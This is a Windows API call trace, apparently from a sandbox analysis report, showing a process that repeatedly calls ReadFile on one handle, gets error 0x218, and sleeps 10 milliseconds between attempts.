	[0247.137] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.137] GetLastError () returned 0x218
	[0247.137] Sleep (dwMilliseconds=0xa) 
	[0247.152] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.152] GetLastError () returned 0x218
	[0247.153] Sleep (dwMilliseconds=0xa) 
	[0247.215] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.215] GetLastError () returned 0x218
	[0247.215] Sleep (dwMilliseconds=0xa) 
	[0247.293] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.293] GetLastError () returned 0x218
	[0247.293] Sleep (dwMilliseconds=0xa) 
	[0247.339] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.339] GetLastError () returned 0x218
	[0247.339] Sleep (dwMilliseconds=0xa) 
	[0247.381] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.381] GetLastError () returned 0x218
	[0247.381] Sleep (dwMilliseconds=0xa) 
	[0247.387] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.387] GetLastError () returned 0x218
	[0247.387] Sleep (dwMilliseconds=0xa) 
	[0247.401] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.401] GetLastError () returned 0x218
	[0247.401] Sleep (dwMilliseconds=0xa) 
	[0247.417] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.417] GetLastError () returned 0x218
	[0247.417] Sleep (dwMilliseconds=0xa) 
	[0247.433] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.433] GetLastError () returned 0x218
	[0247.433] Sleep (dwMilliseconds=0xa) 
	[0247.449] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.449] GetLastError () returned 0x218
	[0247.449] Sleep (dwMilliseconds=0xa) 
	[0247.464] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.464] GetLastError () returned 0x218
	[0247.465] Sleep (dwMilliseconds=0xa) 
	[0247.482] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.482] GetLastError () returned 0x218
	[0247.482] Sleep (dwMilliseconds=0xa) 
	[0247.528] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.528] GetLastError () returned 0x218
	[0247.528] Sleep (dwMilliseconds=0xa) 
	[0247.568] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.569] GetLastError () returned 0x218
	[0247.569] Sleep (dwMilliseconds=0xa) 
	[0247.620] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.620] GetLastError () returned 0x218
	[0247.620] Sleep (dwMilliseconds=0xa) 
	[0247.647] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.647] GetLastError () returned 0x218
	[0247.647] Sleep (dwMilliseconds=0xa) 
	[0247.651] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.651] GetLastError () returned 0x218
	[0247.651] Sleep (dwMilliseconds=0xa) 
	[0247.667] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.667] GetLastError () returned 0x218
	[0247.667] Sleep (dwMilliseconds=0xa) 
	[0247.682] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.682] GetLastError () returned 0x218
	[0247.682] Sleep (dwMilliseconds=0xa) 
	[0247.698] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.698] GetLastError () returned 0x218
	[0247.698] Sleep (dwMilliseconds=0xa) 
	[0247.713] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.713] GetLastError () returned 0x218
	[0247.713] Sleep (dwMilliseconds=0xa) 
	[0247.730] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.730] GetLastError () returned 0x218
	[0247.730] Sleep (dwMilliseconds=0xa) 
	[0247.745] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.745] GetLastError () returned 0x218
	[0247.745] Sleep (dwMilliseconds=0xa) 
	[0247.792] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.792] GetLastError () returned 0x218
	[0247.792] Sleep (dwMilliseconds=0xa) 
	[0247.838] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.838] GetLastError () returned 0x218
	[0247.838] Sleep (dwMilliseconds=0xa) 
	[0247.885] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.885] GetLastError () returned 0x218
	[0247.885] Sleep (dwMilliseconds=0xa) 
	[0247.907] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.907] GetLastError () returned 0x218
	[0247.907] Sleep (dwMilliseconds=0xa) 
	[0247.939] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.939] GetLastError () returned 0x218
	[0247.939] Sleep (dwMilliseconds=0xa) 
	[0247.947] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.947] GetLastError () returned 0x218
	[0247.947] Sleep (dwMilliseconds=0xa) 
	[0247.963] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.963] GetLastError () returned 0x218
	[0247.963] Sleep (dwMilliseconds=0xa) 
	[0247.978] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.978] GetLastError () returned 0x218
	[0247.979] Sleep (dwMilliseconds=0xa) 
	[0247.994] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.994] GetLastError () returned 0x218
	[0247.995] Sleep (dwMilliseconds=0xa) 
	[0248.010] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.011] GetLastError () returned 0x218
	[0248.011] Sleep (dwMilliseconds=0xa) 
	[0248.057] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.057] GetLastError () returned 0x218
	[0248.057] Sleep (dwMilliseconds=0xa) 
	[0248.151] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.151] GetLastError () returned 0x218
	[0248.151] Sleep (dwMilliseconds=0xa) 
	[0248.229] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.229] GetLastError () returned 0x218
	[0248.229] Sleep (dwMilliseconds=0xa) 
	[0248.245] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.245] GetLastError () returned 0x218
	[0248.245] Sleep (dwMilliseconds=0xa) 
	[0248.260] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.260] GetLastError () returned 0x218
	[0248.260] Sleep (dwMilliseconds=0xa) 
	[0248.278] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.278] GetLastError () returned 0x218
	[0248.278] Sleep (dwMilliseconds=0xa) 
	[0248.292] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.292] GetLastError () returned 0x218
	[0248.292] Sleep (dwMilliseconds=0xa) 
	[0248.308] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.308] GetLastError () returned 0x218
	[0248.308] Sleep (dwMilliseconds=0xa) 
	[0248.325] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.325] GetLastError () returned 0x218
	[0248.325] Sleep (dwMilliseconds=0xa) 
	[0248.340] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.340] GetLastError () returned 0x218
	[0248.340] Sleep (dwMilliseconds=0xa) 
	[0248.355] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.355] GetLastError () returned 0x218
	[0248.355] Sleep (dwMilliseconds=0xa) 
	[0248.401] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.401] GetLastError () returned 0x218
	[0248.401] Sleep (dwMilliseconds=0xa) 
	[0248.447] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.447] GetLastError () returned 0x218
	[0248.447] Sleep (dwMilliseconds=0xa) 
	[0248.493] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.493] GetLastError () returned 0x218
	[0248.493] Sleep (dwMilliseconds=0xa) 
	[0248.509] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.509] GetLastError () returned 0x218
	[0248.509] Sleep (dwMilliseconds=0xa) 
	[0248.536] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.536] GetLastError () returned 0x218
	[0248.536] Sleep (dwMilliseconds=0xa) 
	[0248.541] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.541] GetLastError () returned 0x218
	[0248.541] Sleep (dwMilliseconds=0xa) 
	[0248.556] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.556] GetLastError () returned 0x218
	[0248.556] Sleep (dwMilliseconds=0xa) 
	[0248.572] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.572] GetLastError () returned 0x218
	[0248.572] Sleep (dwMilliseconds=0xa) 
	[0248.587] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.587] GetLastError () returned 0x218
	[0248.587] Sleep (dwMilliseconds=0xa) 
	[0248.602] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.603] GetLastError () returned 0x218
	[0248.603] Sleep (dwMilliseconds=0xa) 
	[0248.649] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.649] GetLastError () returned 0x218
	[0248.649] Sleep (dwMilliseconds=0xa) 
	[0248.696] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.696] GetLastError () returned 0x218
	[0248.696] Sleep (dwMilliseconds=0xa) 
	[0248.740] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.740] GetLastError () returned 0x218
	[0248.740] Sleep (dwMilliseconds=0xa) 
	[0248.743] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.743] GetLastError () returned 0x218
	[0248.743] Sleep (dwMilliseconds=0xa) 
	[0248.758] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.759] GetLastError () returned 0x218
	[0248.759] Sleep (dwMilliseconds=0xa) 
	[0248.774] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.774] GetLastError () returned 0x218
	[0248.774] Sleep (dwMilliseconds=0xa) 
	[0248.790] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.790] GetLastError () returned 0x218
	[0248.790] Sleep (dwMilliseconds=0xa) 
	[0248.812] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.812] GetLastError () returned 0x218
	[0248.812] Sleep (dwMilliseconds=0xa) 
	[0248.821] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.821] GetLastError () returned 0x218
	[0248.821] Sleep (dwMilliseconds=0xa) 
	[0248.837] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.837] GetLastError () returned 0x218
	[0248.837] Sleep (dwMilliseconds=0xa) 
	[0248.883] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.883] GetLastError () returned 0x218
	[0248.883] Sleep (dwMilliseconds=0xa) 
	[0248.930] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.930] GetLastError () returned 0x218
	[0248.930] Sleep (dwMilliseconds=0xa) 
	[0248.971] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.971] GetLastError () returned 0x218
	[0248.971] Sleep (dwMilliseconds=0xa) 
	[0248.977] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.977] GetLastError () returned 0x218
	[0248.977] Sleep (dwMilliseconds=0xa) 
	[0248.993] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0248.993] GetLastError () returned 0x218
	[0248.993] Sleep (dwMilliseconds=0xa) 
	[0249.008] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0249.009] GetLastError () returned 0x218
	[0249.009] Sleep (dwMilliseconds=0xa) 
	[0249.024] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0249.024] GetLastError () returned 0x218
	[0249.024] Sleep (dwMilliseconds=0xa) 
	[0249.039] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0249.040] GetLastError () returned 0x218
	[0249.040] Sleep (dwMilliseconds=0xa) 
	[0249.055] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0249.055] GetLastError () returned 0x218
	[0249.055] Sleep (dwMilliseconds=0xa) 
	[0249.070] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0249.070] GetLastError () returned 0x218
	[0249.071] Sleep (dwMilliseconds=0xa) 
	[0249.117] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0249.117] GetLastError () returned 0x218
	[0249.117] Sleep (dwMilliseconds=0xa) 
